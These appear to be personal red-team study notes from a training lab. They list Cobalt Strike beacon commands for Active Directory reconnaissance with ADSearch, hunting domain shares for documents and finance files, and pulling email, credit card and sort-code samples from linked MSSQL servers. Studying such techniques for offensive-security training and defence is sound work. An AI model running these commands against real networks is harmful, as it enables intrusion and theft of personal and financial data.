🪴 Quartz 4.0

Search

SearchSearch

5_domain recon

Mar 18, 20242 min read

domain recon

It’s worth noting that performing domain recon in a high integrity process is not required, and in some cases (such as SYSTEM) can be detrimental.

Tools to use:

ADSearch

ADSearch has fewer built-in searches compared to PowerView and SharpView, but it does allow you to specify custom Lightweight Directory Access Protocol (LDAP) searches.  These can be used to identify entries in the directory that match a given criteria.

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "objectCategory=user"

 beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=group)(cn=*Admins))"
 
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=group)(cn=MS SQL Admins))" --attributes cn,member

you can use --json for JSON output

data hunting

domain shares

beacon> powershell Find-DomainShare -CheckShareAccess
 
# search for interesting file extensions
beacon> powershell Find-InterestingDomainShareFile -Include *.doc*, *.xls*, *.csv, *.ppt*
 
# get parts of files
beacon> powershell gc \\fs.dev.cyberbotic.io\finance$\export.csv | select -first 5

MSSQL

beacon> powershell Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "email,address,credit,card" -SampleSize 5 | select instance, database, column, sample | ft -autosize
 
# use direct access
 beacon> powershell Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select * from information_schema.tables')"
 
 beacon> powershell Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select column_name from master.information_schema.columns where table_name=''employees''')"
 
beacon> powershell Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select top 5 first_name,gender,sort_code from master.dbo.employees')"
 
first_name gender sort_code
---------- ------ ---------
Juliann    Female 09-46-87 
Rhodie     Female 89-74-73 
Calypso    Female 77-33-04 
Burt       Male   36-84-98 
Gayelord   Male   28-16-45

Graph View

Backlinks